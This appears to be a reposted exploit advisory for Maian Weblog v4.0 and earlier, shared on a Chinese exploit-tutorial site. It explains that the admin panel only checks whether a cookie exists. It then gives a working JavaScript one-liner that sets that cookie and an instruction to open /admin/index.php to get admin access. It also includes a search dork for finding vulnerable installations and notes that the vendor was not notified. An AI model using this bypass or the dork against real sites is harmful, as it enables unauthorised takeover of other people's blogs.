Maian Weblog_Exploit教程-查字典教程网
Maian Weblog
Maian Weblog
发布时间:2016-12-21 来源:查字典编辑
摘要:-[*]==================================================================...

-[*] ================================================================================ [*]-

-[*] Maian Weblog <= v4.0 Insecure Cookie Handling Vulnerability [*]-

-[*] ================================================================================ [*]-

[*] Discovered By: S.W.A.T.

[*] E-Mail: svvateam[at]yahoo[dot]com

[*] Script Download: http://www.maianscriptworld.co.uk

[*] DORK: Powered by Maian Weblog v4.0

[*] Vendor Has Not Been Notified!

[*] DESCRIPTION:

Maian Weblog suffers from a insecure cookie, the admin panel only checks if the cookie

exists.

and not the content. so we can easyily craft a cookie and look like a admin.

[*] Vulnerability:

javascript:document.cookie = "weblog_cookie=1; path=/";

[*] NOTE/TIP:

after running the javascript, visit "/admin/index.php" to view admin area.

-[*] ================================================================================ [*]-

-[*] Maian Weblog <= v4.0 Insecure Cookie Handling Vulnerability [*]-

-[*] ================================================================================ [*]-

相关阅读
推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
  • 大家都在看
  • 小编推荐
  • 猜你喜欢
  • 最新Exploit学习
    热门Exploit学习
    网络安全子分类